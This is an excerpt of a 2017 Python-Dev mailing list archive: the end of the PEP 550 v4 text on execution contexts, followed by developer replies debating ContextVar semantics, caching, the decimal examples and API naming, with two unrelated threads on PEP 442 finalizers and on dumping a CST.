No.  Proper generator behaviour with respect to the execution context requires changes to the interpreter.

Should we update sys.displayhook and other APIs to use EC?
----------------------------------------------------------

APIs like redirecting stdout by overwriting ``sys.stdout``, or specifying new exception display hooks by overwriting the ``sys.displayhook`` function, affect the whole Python process **by design**.  Their users assume that the effect of changing them will be visible across OS threads.  Therefore we cannot just make these APIs use the new Execution Context.

That said, we think it is possible to design new APIs that will be context-aware, but that is outside of the scope of this PEP.

Greenlets
---------

Greenlet is an alternative implementation of cooperative scheduling for Python.  Although the greenlet package is not part of CPython, popular frameworks like gevent rely on it, and it is important that greenlet can be modified to support execution contexts.

Conceptually, the behaviour of greenlets is very similar to that of generators, which means that similar changes around greenlet entry and exit can be done to add support for execution context.

Backwards Compatibility
=======================

This proposal preserves 100% backwards compatibility.

Appendix: HAMT Performance Analysis
===================================

.. figure:: pep-0550-hamt_vs_dict-v2.png
   :align: center
   :width: 100%

   Figure 1.  Benchmark code can be found here: [9]_.

The above chart demonstrates that:

* HAMT displays near O(1) performance for all benchmarked dictionary sizes.

* ``dict.copy()`` becomes very slow around 100 items.

.. figure:: pep-0550-lookup_hamt.png
   :align: center
   :width: 100%

   Figure 2.  Benchmark code can be found here: [10]_.

Figure 2 compares the lookup costs of ``dict`` versus a HAMT-based immutable mapping.
HAMT lookup time is 30-40% slower than Python dict lookups on average, which is a very good result, considering that the latter is very well optimized.

There is research [8]_ showing that there are further possible improvements to the performance of HAMT.

The reference implementation of HAMT for CPython can be found here: [7]_.

Acknowledgments
===============

Thanks to Victor Petrovykh for countless discussions around the topic and PEP proofreading and edits.

Thanks to Nathaniel Smith for proposing the ``ContextVar`` design [17]_ [18]_, for pushing the PEP towards a more complete design, and coming up with the idea of having a stack of contexts in the thread state.

Thanks to Nick Coghlan for numerous suggestions and ideas on the mailing list, and for coming up with a case that caused the complete rewrite of the initial PEP version [19]_.

Version History
===============

1. Initial revision, posted on 11-Aug-2017 [20]_.

2. V2 posted on 15-Aug-2017 [21]_.

   The fundamental limitation that caused a complete redesign of the first version was that it was not possible to implement an iterator that would interact with the EC in the same way as generators (see [19]_.)

   Version 2 was a complete rewrite, introducing new terminology (Local Context, Execution Context, Context Item) and new APIs.

3. V3 posted on 18-Aug-2017 [22]_.  Updates:

   * Local Context was renamed to Logical Context.  The term "local" was ambiguous and conflicted with local name scopes.

   * Context Item was renamed to Context Key, see the thread with Nick Coghlan, Stefan Krah, and Yury Selivanov [23]_ for details.

   * Context Item get cache design was adjusted, per Nathaniel Smith's idea in [25]_.

   * Coroutines are created without a Logical Context; the ceval loop no longer needs to special-case the ``await`` expression (proposed by Nick Coghlan in [24]_.)

4. V4 posted on 25-Aug-2017: the current version.

   * The specification section has been completely rewritten.

   * Context Key renamed to Context Var.

   * Removed the distinction between generators and coroutines with respect to logical context isolation.

References
==========

.. [1] https://blog.golang.org/context

.. [2] https://msdn.microsoft.com/en-us/library/system.threading.executioncontext.aspx

.. [3] https://github.com/numpy/numpy/issues/9444

.. [4] http://bugs.python.org/issue31179

.. [5] https://en.wikipedia.org/wiki/Hash_array_mapped_trie

.. [6] http://blog.higher-order.net/2010/08/16/assoc-and-clojures-persistenthashmap-part-ii.html

.. [7] https://github.com/1st1/cpython/tree/hamt

.. [8] https://michael.steindorfer.name/publications/oopsla15.pdf

.. [9] https://gist.github.com/1st1/9004813d5576c96529527d44c5457dcd

.. [10] https://gist.github.com/1st1/dbe27f2e14c30cce6f0b5fddfc8c437e

.. [11] https://github.com/1st1/cpython/tree/pep550

.. [12] https://www.python.org/dev/peps/pep-0492/#async-await

.. [13] https://github.com/MagicStack/uvloop/blob/master/examples/bench/echoserver.py

.. [14] https://github.com/MagicStack/pgbench

.. [15] https://github.com/python/performance

.. [16] https://gist.github.com/1st1/6b7a614643f91ead3edf37c4451a6b4c

.. [17] https://mail.python.org/pipermail/python-ideas/2017-August/046752.html

.. [18] https://mail.python.org/pipermail/python-ideas/2017-August/046772.html

.. [19] https://mail.python.org/pipermail/python-ideas/2017-August/046775.html

.. [20] https://github.com/python/peps/blob/e8a06c9a790f39451d9e99e203b13b3ad73a1d01/pep-0550.rst

.. [21] https://github.com/python/peps/blob/e3aa3b2b4e4e9967d28a10827eed1e9e5960c175/pep-0550.rst
.. [22] https://github.com/python/peps/blob/287ed87bb475a7da657f950b353c71c1248f67e7/pep-0550.rst

.. [23] https://mail.python.org/pipermail/python-ideas/2017-August/046801.html

.. [24] https://mail.python.org/pipermail/python-ideas/2017-August/046790.html

.. [25] https://mail.python.org/pipermail/python-ideas/2017-August/046786.html

Copyright
=========

This document has been placed in the public domain.

From njs at pobox.com  Sat Aug 26 02:34:29 2017
From: njs at pobox.com (Nathaniel Smith)
Date: Fri, 25 Aug 2017 23:34:29 -0700
Subject: [Python-Dev] PEP 550 v4
In-Reply-To: 
References: 
Message-ID: 

On Fri, Aug 25, 2017 at 3:32 PM, Yury Selivanov wrote:
> Coroutines and Asynchronous Tasks
> ---------------------------------
>
> In coroutines, like in generators, context variable changes are local
> and are not visible to the caller::
>
>     import asyncio
>
>     var = new_context_var()
>
>     async def sub():
>         assert var.lookup() == 'main'
>         var.set('sub')
>         assert var.lookup() == 'sub'
>
>     async def main():
>         var.set('main')
>         await sub()
>         assert var.lookup() == 'main'
>
>     loop = asyncio.get_event_loop()
>     loop.run_until_complete(main())

I think this change is a bad idea. I think that generally, an async call like 'await async_sub()' should have the equivalent semantics to a synchronous call like 'sync_sub()', except for the part where the former is able to contain yields. Giving every coroutine an LC breaks that equivalence. It also makes it so in async code, you can't necessarily refactor by moving code in and out of subroutines. Like, if we inline 'sub' into 'main', that shouldn't change the semantics, but...

    async def main():
        var.set('main')
        # inlined copy of sub()
        assert var.lookup() == 'main'
        var.set('sub')
        assert var.lookup() == 'sub'
        # end of inlined copy
        assert var.lookup() == 'main'   # fails

It also adds non-trivial overhead, because now lookup() is O(depth of async callstack), instead of O(depth of (async) generator nesting), which is generally much smaller.

I think I see the motivation: you want to make

    await sub()

and

    await ensure_future(sub())

have the same semantics, right? And the latter has to create a Task and split it off into a new execution context, so you want the former to do so as well? But to me this is like saying that we want

    sync_sub()

and

    thread_pool_executor.submit(sync_sub).result()

to have the same semantics: they mostly do, but if sync_sub() accesses thread-locals then they won't. Oh well. That's perhaps a bit unfortunate, but it doesn't mean we should give every synchronous frame its own thread-locals. (And fwiw I'm still not convinced we should give up on 'yield from' as a mechanism for refactoring generators.)

> To establish the full semantics of execution context in coroutines,
> we must also consider *tasks*.  A task is the abstraction used by
> *asyncio*, and other similar libraries, to manage the concurrent
> execution of coroutines.  In the example above, a task is created
> implicitly by the ``run_until_complete()`` function.
> ``asyncio.wait_for()`` is another example of implicit task creation::
>
>     async def sub():
>         await asyncio.sleep(1)
>         assert var.lookup() == 'main'
>
>     async def main():
>         var.set('main')
>
>         # waiting for sub() directly
>         await sub()
>
>         # waiting for sub() with a timeout
>         await asyncio.wait_for(sub(), timeout=2)
>
>         var.set('main changed')
>
> Intuitively, we expect the assertion in ``sub()`` to hold true in both
> invocations, even though the ``wait_for()`` implementation actually
> spawns a task, which runs ``sub()`` concurrently with ``main()``.

I found this example confusing -- you talk about sub() and main() running concurrently, but ``wait_for`` blocks main() until sub() has finished running, right? Is this just supposed to show that there should be some sort of inheritance across tasks, and then the next example is to show that it has to be a copy rather than sharing the actual object? (This is just an issue of phrasing/readability.)

> The ``sys.run_with_logical_context()`` function performs the following
> steps:
>
> 1. Push *lc* onto the current execution context stack.
> 2. Run ``func(*args, **kwargs)``.
> 3. Pop *lc* from the execution context stack.
> 4. Return or raise the ``func()`` result.

It occurs to me that both this and the way generators/coroutines expose their logical context means that logical context objects are semantically mutable. This could create weird effects if someone attaches the same LC to two different generators, or tries to use it simultaneously in two different threads, etc. We should have a little interlock like generator's ag_running, where an LC keeps track of whether it's currently in use and if you try to push the same LC onto two ECs simultaneously then it errors out.

> For efficient access in performance-sensitive code paths, such as in
> ``numpy`` and ``decimal``, we add a cache to ``ContextVar.get()``,
> making it an O(1) operation when the cache is hit.  The cache key is
> composed from the following:
>
> * The new ``uint64_t PyThreadState->unique_id``, which is a globally
>   unique thread state identifier.  It is computed from the new
>   ``uint64_t PyInterpreterState->ts_counter``, which is incremented
>   whenever a new thread state is created.
>
> * The ``uint64_t ContextVar->version`` counter, which is incremented
>   whenever the context variable value is changed in any logical context
>   in any thread.

I'm pretty sure you need to also invalidate on context push/pop. Consider:

    def gen():
        var.set("gen")
        var.lookup()   # cache now holds "gen"
        yield
        print(var.lookup())

    def main():
        var.set("main")
        g = gen()
        next(g)
        # This should print "main", but it's the same thread and the last call to set() was
        # the one inside gen(), so we get the cached "gen" instead
        print(var.lookup())
        var.set("no really main")
        var.lookup()   # cache now holds "no really main"
        next(g)        # should print "gen" but instead prints "no really main"

> The cache is then implemented as follows::
>
>     class ContextVar:
>
>         def set(self, value):
>             ...  # implementation
>             self.version += 1
>
>
>         def get(self):

I think you missed a s/get/lookup/ here :-)

-n

--
Nathaniel J. Smith -- https://vorpus.org

From stefan_ml at behnel.de  Sat Aug 26 06:22:10 2017
From: stefan_ml at behnel.de (Stefan Behnel)
Date: Sat, 26 Aug 2017 12:22:10 +0200
Subject: [Python-Dev] PEP 550 v4
In-Reply-To: 
References: 
Message-ID: 

Hi,

I'm aware that the current implementation is not final, but I already adapted the coroutine changes for Cython to allow for some initial integration testing with real external (i.e.
non-Python coroutine) targets. I haven't adapted the tests yet, so the changes are currently unused and mostly untested.

https://github.com/scoder/cython/tree/pep550_exec_context

I also left some comments in the github commits along the way.

Stefan

From srkunze at mail.de  Sat Aug 26 09:33:23 2017
From: srkunze at mail.de (Sven R. Kunze)
Date: Sat, 26 Aug 2017 15:33:23 +0200
Subject: [Python-Dev] PEP 550 v4
In-Reply-To: <59A0DAB4.2030807@stoneleaf.us>
References: <59A0DAB4.2030807@stoneleaf.us>
Message-ID: <4f2915bf-d52e-1403-8ab6-602a0decd67c@mail.de>

On 26.08.2017 04:19, Ethan Furman wrote:
> On 08/25/2017 03:32 PM, Yury Selivanov wrote:
>
>> A *context variable* is an object representing a value in the
>> execution context.  A new context variable is created by calling
>> the ``new_context_var()`` function.  A context variable object has
>> two methods:
>>
>> * ``lookup()``: returns the value of the variable in the current
>>   execution context;
>>
>> * ``set()``: sets the value of the variable in the current
>>   execution context.
>
> Why "lookup" and not "get" ?  Many APIs use "get" and its
> functionality is well understood.

Why not the same interface as thread-local storage? This has been the question which has bothered me from the beginning of PEP 550. I don't understand what inventing a new way of access buys us here.

Python has featured regular attribute access for years. It's even simpler than method-based access.

Best,
Sven

From pav at iki.fi  Sat Aug 26 02:31:00 2017
From: pav at iki.fi (Pauli Virtanen)
Date: Sat, 26 Aug 2017 08:31:00 +0200
Subject: [Python-Dev] PEP 442 undocumented C API functions
Message-ID: <1503729060.5586.5.camel@iki.fi>

Hi,

PEP 442 says "Two new C API functions are provided to ease calling of tp_finalize, especially from custom deallocators."

This includes PyObject_CallFinalizerFromDealloc. However, no documentation of these functions appears to exist (https://bugs.python.org/issue31276).

As far as I understand, if you have a custom tp_dealloc, you *have* to call PyObject_CallFinalizerFromDealloc in order to get your tp_finalize called. Is this correct?

However, since the necessary functions are undocumented, it's unclear if they were intended to be public Python API functions. So are they actually public functions that 3rd party extensions can call? If not, how is tp_finalize supposed to be used?

I'd be happy if someone could clarify the issue.

--
Pauli Virtanen

From elprans at gmail.com  Sat Aug 26 10:58:33 2017
From: elprans at gmail.com (Elvis Pranskevichus)
Date: Sat, 26 Aug 2017 10:58:33 -0400
Subject: [Python-Dev] PEP 550 v4
In-Reply-To: 
References: 
Message-ID: <2322879.hcVsH781ou@klinga.prans.org>

On Saturday, August 26, 2017 2:34:29 AM EDT Nathaniel Smith wrote:
> On Fri, Aug 25, 2017 at 3:32 PM, Yury Selivanov wrote:
> > Coroutines and Asynchronous Tasks
> > ---------------------------------
> >
> > In coroutines, like in generators, context variable changes are
> > local and are not visible to the caller::
> >
> >     import asyncio
> >
> >     var = new_context_var()
> >
> >     async def sub():
> >         assert var.lookup() == 'main'
> >         var.set('sub')
> >         assert var.lookup() == 'sub'
> >
> >     async def main():
> >         var.set('main')
> >         await sub()
> >         assert var.lookup() == 'main'
> >
> >     loop = asyncio.get_event_loop()
> >     loop.run_until_complete(main())
>
> I think this change is a bad idea.
> I think that generally, an async
> call like 'await async_sub()' should have the equivalent semantics
> to a synchronous call like 'sync_sub()', except for the part where
> the former is able to contain yields. Giving every coroutine an LC
> breaks that equivalence. It also makes it so in async code, you
> can't necessarily refactor by moving code in and out of
> subroutines. Like, if we inline 'sub' into 'main', that shouldn't
> change the semantics, but...

If we could easily, we'd have given each _normal function_ its own logical context as well.

What we are talking about here is variable scope leaking up the call stack. I think this is a bad pattern. For decimal context-like uses of the EC you should always use a context manager. For uses like Web request locals, you always have a top function that sets the context vars.

> I think I see the motivation: you want to make
>
>     await sub()
>
> and
>
>     await ensure_future(sub())
>
> have the same semantics, right? And the latter has to create a Task

What we want is for `await sub()` to be equivalent to `await asyncio.wait_for(sub())` and to `await asyncio.gather(sub())`.

Imagine we allow context var changes to leak out of `async def`. It's easy to write code that relies on this:

    async def init():
        var.set('foo')

    async def main():
        await init()
        assert var.lookup() == 'foo'

If we change `await init()` to `await asyncio.wait_for(init())`, the code will break (and in the real world, possibly very subtly).

> It also adds non-trivial overhead, because now lookup() is O(depth
> of async callstack), instead of O(depth of (async) generator
> nesting), which is generally much smaller.

You would hit the cache in lookup() most of the time.

                                 Elvis

From shanchuan04 at gmail.com  Sat Aug 26 03:53:48 2017
From: shanchuan04 at gmail.com (yang chen)
Date: Sat, 26 Aug 2017 15:53:48 +0800
Subject: [Python-Dev] how to dump cst
Message-ID: 

Hello, everyone.

I'm learning the Python source code. I used to print debug info while reading the code, but that is not convenient. I want to inspect the CST, AST, and bytecode from IPython: write some code, print its CST, AST, and bytecode, and then read the corresponding source.

However, I can't dump the CST that is later transformed into the AST. I know I can print the CST by modifying the Python source code, but how can I dump the CST from IPython, just like dumping the AST with the ast package?

1. get the AST with the ast package
2. get the bytecode with the dis package
3. but how to get the CST?

From stefan at bytereef.org  Sat Aug 26 07:45:58 2017
From: stefan at bytereef.org (Stefan Krah)
Date: Sat, 26 Aug 2017 13:45:58 +0200
Subject: [Python-Dev] PEP 550 v4: Decimal examples and performance (was: Re: PEP 550 v4)
In-Reply-To: 
References: 
Message-ID: <20170826114558.GA2649@bytereef.org>

Hi,

thanks, on the whole this is *much* easier to understand.

I'll add some comments on the decimal examples. The thing is, decimal is already quite tricky and people do read PEPs long after they have been accepted, so they should probably reflect best practices.

On Fri, Aug 25, 2017 at 06:32:22PM -0400, Yury Selivanov wrote:
> Unfortunately, TLS does not work well for programs which execute
> concurrently in a single thread.  A Python generator is the simplest
> example of a concurrent program.
> Consider the following::
>
>     def fractions(precision, x, y):
>         with decimal.localcontext() as ctx:
>             ctx.prec = precision
>             yield Decimal(x) / Decimal(y)
>             yield Decimal(x) / Decimal(y**2)
>
>     g1 = fractions(precision=2, x=1, y=3)
>     g2 = fractions(precision=6, x=2, y=3)
>
>     items = list(zip(g1, g2))
>
> The expected value of ``items`` is::

"Many people (wrongly) expect the values of ``items`` to be::"  ;)

>
>     [(Decimal('0.33'), Decimal('0.666667')),
>      (Decimal('0.11'), Decimal('0.222222'))]

> Some languages, that support coroutines or generators, recommend
> passing the context manually as an argument to every function, see [1]_
> for an example.  This approach, however, has limited use for Python,
> where there is a large ecosystem that was built to work with a TLS-like
> context.  Furthermore, libraries like ``decimal`` or ``numpy`` rely
> on context implicitly in overloaded operator implementations.

I'm not sure why this approach has limited use for decimal:

    from decimal import *

    def fractions(precision, x, y):
        ctx = Context(prec=precision)
        yield ctx.divide(Decimal(x), Decimal(y))
        yield ctx.divide(Decimal(x), Decimal(y**2))

    g1 = fractions(precision=2, x=1, y=3)
    g2 = fractions(precision=6, x=2, y=3)
    print(list(zip(g1, g2)))

This is the first thing I'd do when writing async-safe code.

Again, people do read PEPs. So if an asyncio programmer without any special knowledge of decimal reads the PEP, he probably assumes that localcontext() is currently the only option, while the safer and easy-to-reason-about context methods exist.

> Now, let's revisit the decimal precision example from the `Rationale`_
> section, and see how the execution context can improve the situation::
>
>     import decimal
>
>     decimal_prec = new_context_var()  # create a new context variable
>
>     # Pre-PEP 550 Decimal relies on TLS for its context.
>     # This subclass switches the decimal context storage
>     # to the execution context for illustration purposes.
>     #
>     class MyDecimal(decimal.Decimal):
>         def __init__(self, value="0"):
>             prec = decimal_prec.lookup()
>             if prec is None:
>                 raise ValueError('could not find decimal precision')
>             context = decimal.Context(prec=prec)
>             super().__init__(value, context=context)

As I understand it, the example creates a context with a custom precision and attempts to use that context to create a Decimal.

This doesn't switch the actual decimal context. Secondly, the precision in the context argument to the Decimal() constructor has no effect --- the context there is only used for error handling.

Lastly, if the constructor *did* use the precision, one would have to be careful about double rounding when using MyDecimal().

I get that this is supposed to be for illustration only, but please let's be careful about what people might take away from that code.

> This generic caching approach is similar to what the current C
> implementation of ``decimal`` does to cache the current decimal
> context, and has similar performance characteristics.

I think it'll work, but can we agree on hard numbers like max 2% slowdown for the non-threaded case and 4% for applications that only use threads? I'm a bit cautious because other C-extension state-managing PEPs didn't come close to these figures.
Stefan Krah

From yselivanov.ml at gmail.com  Sat Aug 26 12:21:44 2017
From: yselivanov.ml at gmail.com (Yury Selivanov)
Date: Sat, 26 Aug 2017 12:21:44 -0400
Subject: [Python-Dev] PEP 550 v4: Decimal examples and performance (was: Re: PEP 550 v4)
In-Reply-To: <20170826114558.GA2649@bytereef.org>
References: <20170826114558.GA2649@bytereef.org>
Message-ID: 

On Sat, Aug 26, 2017 at 7:45 AM, Stefan Krah wrote:
>
> Hi,
>
> thanks, on the whole this is *much* easier to understand.

Thanks!

> I'll add some comments on the decimal examples. The thing is, decimal
> is already quite tricky and people do read PEPs long after they have
> been accepted, so they should probably reflect best practices.

Agree.

[..]
>> Some languages, that support coroutines or generators, recommend
>> passing the context manually as an argument to every function, see [1]_
>> for an example.  This approach, however, has limited use for Python,
>> where there is a large ecosystem that was built to work with a TLS-like
>> context.  Furthermore, libraries like ``decimal`` or ``numpy`` rely
>> on context implicitly in overloaded operator implementations.
>
> I'm not sure why this approach has limited use for decimal:
>
>     from decimal import *
>
>     def fractions(precision, x, y):
>         ctx = Context(prec=precision)
>         yield ctx.divide(Decimal(x), Decimal(y))
>         yield ctx.divide(Decimal(x), Decimal(y**2))
>
>     g1 = fractions(precision=2, x=1, y=3)
>     g2 = fractions(precision=6, x=2, y=3)
>     print(list(zip(g1, g2)))

Because you have to know the limitations of implicit decimal context to make this choice.  Most people don't (at least from my experience).

> This is the first thing I'd do when writing async-safe code.

Because you know the decimal module very well :)

> Again, people do read PEPs. So if an asyncio programmer without any
> special knowledge of decimal reads the PEP, he probably assumes that
> localcontext() is currently the only option, while the safer and
> easy-to-reason-about context methods exist.

I agree.

>> Now, let's revisit the decimal precision example from the `Rationale`_
>> section, and see how the execution context can improve the situation::
>>
>>     import decimal
>>
>>     decimal_prec = new_context_var()  # create a new context variable
>>
>>     # Pre-PEP 550 Decimal relies on TLS for its context.
>>     # This subclass switches the decimal context storage
>>     # to the execution context for illustration purposes.
>>     #
>>     class MyDecimal(decimal.Decimal):
>>         def __init__(self, value="0"):
>>             prec = decimal_prec.lookup()
>>             if prec is None:
>>                 raise ValueError('could not find decimal precision')
>>             context = decimal.Context(prec=prec)
>>             super().__init__(value, context=context)
>
> As I understand it, the example creates a context with a custom precision
> and attempts to use that context to create a Decimal.
>
> This doesn't switch the actual decimal context. Secondly, the precision in
> the context argument to the Decimal() constructor has no effect --- the
> context there is only used for error handling.
>
> Lastly, if the constructor *did* use the precision, one would have to be
> careful about double rounding when using MyDecimal().
>
> I get that this is supposed to be for illustration only, but please let's
> be careful about what people might take away from that code.

In the next iteration of the PEP we'll remove decimal examples and replace them with something with simpler semantics.  This is clearly the best choice now.
>> This generic caching approach is similar to what the current C
>> implementation of ``decimal`` does to cache the current decimal
>> context, and has similar performance characteristics.
>
> I think it'll work, but can we agree on hard numbers like max 2% slowdown
> for the non-threaded case and 4% for applications that only use threads?

I'd be *very* surprised if we see any noticeable slowdown at all. The way ContextVars will implement caching is very similar to the trick you use now.

Yury

From yselivanov.ml at gmail.com  Sat Aug 26 12:25:24 2017
From: yselivanov.ml at gmail.com (Yury Selivanov)
Date: Sat, 26 Aug 2017 12:25:24 -0400
Subject: [Python-Dev] PEP 550 v4
In-Reply-To: <59A0DAB4.2030807@stoneleaf.us>
References: <59A0DAB4.2030807@stoneleaf.us>
Message-ID: 

On Fri, Aug 25, 2017 at 10:19 PM, Ethan Furman wrote:
> All in all, I like it.  Nice job.

Thanks!

> On 08/25/2017 03:32 PM, Yury Selivanov wrote:
>
>> A *context variable* is an object representing a value in the
>> execution context.  A new context variable is created by calling
>> the ``new_context_var()`` function.  A context variable object has
>> two methods:
>>
>> * ``lookup()``: returns the value of the variable in the current
>>   execution context;
>>
>> * ``set()``: sets the value of the variable in the current
>>   execution context.
>
> Why "lookup" and not "get" ?  Many APIs use "get" and its functionality is
> well understood.

The ContextVar.set(value) method writes the `value` to the *topmost LC*.

The ContextVar.lookup() method *traverses the stack* until it finds the LC that has a value.  "get()" does not reflect this subtle semantics difference.

Yury

From yselivanov.ml at gmail.com  Sat Aug 26 12:28:38 2017
From: yselivanov.ml at gmail.com (Yury Selivanov)
Date: Sat, 26 Aug 2017 12:28:38 -0400
Subject: [Python-Dev] PEP 550 v4
In-Reply-To: 
References: 
Message-ID: 

On Sat, Aug 26, 2017 at 6:22 AM, Stefan Behnel wrote:
> Hi,
>
> I'm aware that the current implementation is not final, but I already
> adapted the coroutine changes for Cython to allow for some initial
> integration testing with real external (i.e. non-Python coroutine) targets.
> I haven't adapted the tests yet, so the changes are currently unused and
> mostly untested.
>
> https://github.com/scoder/cython/tree/pep550_exec_context
>
> I also left some comments in the github commits along the way.

Huge thanks for thinking about how this proposal will work for Cython and trying it out.  Although I must warn you that the last reference implementation is very outdated, and the implementation we will end up with will be very different (think a total rewrite from scratch).

Yury

From barry at python.org  Sat Aug 26 12:30:10 2017
From: barry at python.org (Barry Warsaw)
Date: Sat, 26 Aug 2017 12:30:10 -0400
Subject: [Python-Dev] PEP 550 v4
In-Reply-To: <59A0DAB4.2030807@stoneleaf.us>
References: <59A0DAB4.2030807@stoneleaf.us>
Message-ID: 

I agree with David; this PEP has really gotten to a great place and the new organization makes it much easier to understand.

> On Aug 25, 2017, at 22:19, Ethan Furman wrote:
>
> Why "lookup" and not "get" ?  Many APIs use "get" and its functionality is well understood.

I have the same question as Sven as to why we can't have attribute access semantics.  I probably asked that before, and you probably answered, so maybe if there's a specific reason why this can't be supported, the PEP should include a "rejected ideas" section explaining the choice.
That said, if we have to use method lookup, then I agree that `.get()` is a better choice than `.lookup()`.  But in that case, would it be possible to add an optional `default=None` argument so that you can specify a marker object for a missing value?  I worry that None might be a valid value in some cases, but that currently can't be distinguished from "missing".

I'd also like a debugging interface, such that I can ask "context_var.get()" and get some easy diagnostics about the resolution order.

Cheers,
-Barry

From yselivanov.ml at gmail.com  Sat Aug 26 12:31:50 2017
From: yselivanov.ml at gmail.com (Yury Selivanov)
Date: Sat, 26 Aug 2017 12:31:50 -0400
Subject: [Python-Dev] PEP 550 v4
In-Reply-To: <4f2915bf-d52e-1403-8ab6-602a0decd67c@mail.de>
References: <59A0DAB4.2030807@stoneleaf.us> <4f2915bf-d52e-1403-8ab6-602a0decd67c@mail.de>
Message-ID: 

On Sat, Aug 26, 2017 at 9:33 AM, Sven R. Kunze wrote:
[..]
> Why not the same interface as thread-local storage? This has been the
> question which bothered me from the beginning of PEP550. I don't understand
> what inventing a new way of access buys us here.

This was covered at length in these threads:

https://mail.python.org/pipermail/python-ideas/2017-August/046888.html
https://mail.python.org/pipermail/python-ideas/2017-August/046889.html

I forgot to add a subsection to "Design Considerations" with a summary of that thread.  Will be fixed in the next revision.

Yury

From yselivanov.ml at gmail.com  Sat Aug 26 12:35:41 2017
From: yselivanov.ml at gmail.com (Yury Selivanov)
Date: Sat, 26 Aug 2017 12:35:41 -0400
Subject: [Python-Dev] PEP 550 v4
In-Reply-To: 
References: 
Message-ID: 

On Sat, Aug 26, 2017 at 12:56 AM, David Mertz wrote:
> This is now looking really good and I can understand it.

Great!

> One question though. Sometimes creation of a context variable is done with a
> name argument, other times not. E.g.
>
>     var1 = new_context_var('var1')
>     var = new_context_var()

We were very focused on making the High-level Specification as succinct as possible, omitting some API details that are not important for understanding the semantics.

The "name" argument is not optional and will be required.  If it were optional, people would not provide it, making it very hard to introspect the context when we want to.

I guess we'll just update the High-level Specification section to use the correct signature of "new_context_var".

Yury

From emilyemorehouse at gmail.com  Sat Aug 26 12:35:03 2017
From: emilyemorehouse at gmail.com (Emily E Morehouse)
Date: Sat, 26 Aug 2017 10:35:03 -0600
Subject: [Python-Dev] how to dump cst
In-Reply-To: 
References: 
Message-ID: 

Hi,

I believe the parser module allows for generation of a CST, though the documentation is not specific about the type of syntax tree used.  The old compiler module utilized it for this purpose and contains explicit documentation about getting a CST from the parser module.

-- EMV

On Sat, Aug 26, 2017 at 1:53 AM, yang chen wrote:
> Hello, everyone.
>
> I'm learning the Python source code. I used to print debug info while
> reading the code, but that is not convenient. I want to inspect the CST,
> AST, and bytecode from IPython: write some code, print its CST, AST, and
> bytecode, and then read the corresponding source.
> However, I can't dump the CST that is later transformed into the AST. I
> know I can print the CST by modifying the Python source code, but how can
> I dump the CST from IPython, just like dumping the AST with the ast
> package?
>
> 1. get the AST with the ast package
> 2. get the bytecode with the dis package
> 3. but how to get the CST?

From francismb at email.de  Sat Aug 26 12:43:05 2017
From: francismb at email.de (francismb)
Date: Sat, 26 Aug 2017 18:43:05 +0200
Subject: [Python-Dev] Scope, not context? (was Re: PEP 550 v3 naming)
In-Reply-To: <20170824233221.76ff8934@fsol>
References: <5ab66d01-3493-c400-b953-3896452b67b0@email.de> <20170824233221.76ff8934@fsol>
Message-ID: <4872acac-ba35-ba88-2596-2c18d9b28dcc@email.de>

>> I propose RaymondLuxuryYach_t, but we'll have to pronounce it ThroatwobblerMangrove.
>
> Sorry, but I think we should pronounce it ThroatwobblerMangrove.
>
too hard to pronounce, but at least it's unique; I would prefer thredarena, but I see naming is hard ... :-)

Thanks!
--francis

From barry at python.org  Sat Aug 26 12:51:08 2017
From: barry at python.org (Barry Warsaw)
Date: Sat, 26 Aug 2017 12:51:08 -0400
Subject: [Python-Dev] Scope, not context? (was Re: PEP 550 v3 naming)
In-Reply-To: <4872acac-ba35-ba88-2596-2c18d9b28dcc@email.de>
References: <5ab66d01-3493-c400-b953-3896452b67b0@email.de> <20170824233221.76ff8934@fsol> <4872acac-ba35-ba88-2596-2c18d9b28dcc@email.de>
Message-ID: 

On Aug 26, 2017, at 12:43, francismb wrote:
>
>>> I propose RaymondLuxuryYach_t, but we'll have to pronounce it ThroatwobblerMangrove.
>>
>> Sorry, but I think we should pronounce it ThroatwobblerMangrove.
>>
> too hard to pronounce, but at least it's unique; I would prefer thredarena,
> but I see naming is hard ... :-)

Oh mollusks, I thought you said bacon.

-Barry

From mertz at gnosis.cx  Sat Aug 26 13:10:26 2017
From: mertz at gnosis.cx (David Mertz)
Date: Sat, 26 Aug 2017 10:10:26 -0700
Subject: [Python-Dev] PEP 550 v4
In-Reply-To: 
References: 
Message-ID: 

Would it be possible/desirable to make the default a unique string value like a UUID or a stringified counter?

On Aug 26, 2017 9:35 AM, "Yury Selivanov" wrote:

On Sat, Aug 26, 2017 at 12:56 AM, David Mertz wrote:
> This is now looking really good and I can understand it.

Great!

> One question though. Sometimes creation of a context variable is done with a
> name argument, other times not. E.g.
>
>     var1 = new_context_var('var1')
>     var = new_context_var()

We were very focused on making the High-level Specification as succinct as possible, omitting some API details that are not important for understanding the semantics.

The "name" argument is not optional and will be required.  If it were optional, people would not provide it, making it very hard to introspect the context when we want to.

I guess we'll just update the High-level Specification section to use the correct signature of "new_context_var".

Yury
From yselivanov.ml at gmail.com  Sat Aug 26 13:15:06 2017
From: yselivanov.ml at gmail.com (Yury Selivanov)
Date: Sat, 26 Aug 2017 13:15:06 -0400
Subject: [Python-Dev] PEP 550 v4
In-Reply-To: 
References: 
Message-ID: 

On Sat, Aug 26, 2017 at 2:34 AM, Nathaniel Smith wrote:
> On Fri, Aug 25, 2017 at 3:32 PM, Yury Selivanov wrote:
>> Coroutines and Asynchronous Tasks
>> ---------------------------------
>>
>> In coroutines, like in generators, context variable changes are local
>> and are not visible to the caller::
>>
>>     import asyncio
>>
>>     var = new_context_var()
>>
>>     async def sub():
>>         assert var.lookup() == 'main'
>>         var.set('sub')
>>         assert var.lookup() == 'sub'
>>
>>     async def main():
>>         var.set('main')
>>         await sub()
>>         assert var.lookup() == 'main'
>>
>>     loop = asyncio.get_event_loop()
>>     loop.run_until_complete(main())
>
> I think this change is a bad idea. I think that generally, an async
> call like 'await async_sub()' should have the equivalent semantics to
> a synchronous call like 'sync_sub()', except for the part where the
> former is able to contain yields.

That exception is why the semantics cannot be equivalent.

> Giving every coroutine an LC breaks
> that equivalence. It also makes it so in async code, you can't
> necessarily refactor by moving code in and out of subroutines.

I'll cover the refactoring argument later in this email.

[..]
> It also adds non-trivial overhead, because now lookup() is O(depth of
> async callstack), instead of O(depth of (async) generator nesting),
> which is generally much smaller.

I don't think it's non-trivial though:

First, we have a cache in ContextVar which makes lookup O(1) for any tight code that uses libraries like decimal and numpy.

Second, most of the LCs in the chain will be empty, so even the uncached lookup will still be fast.

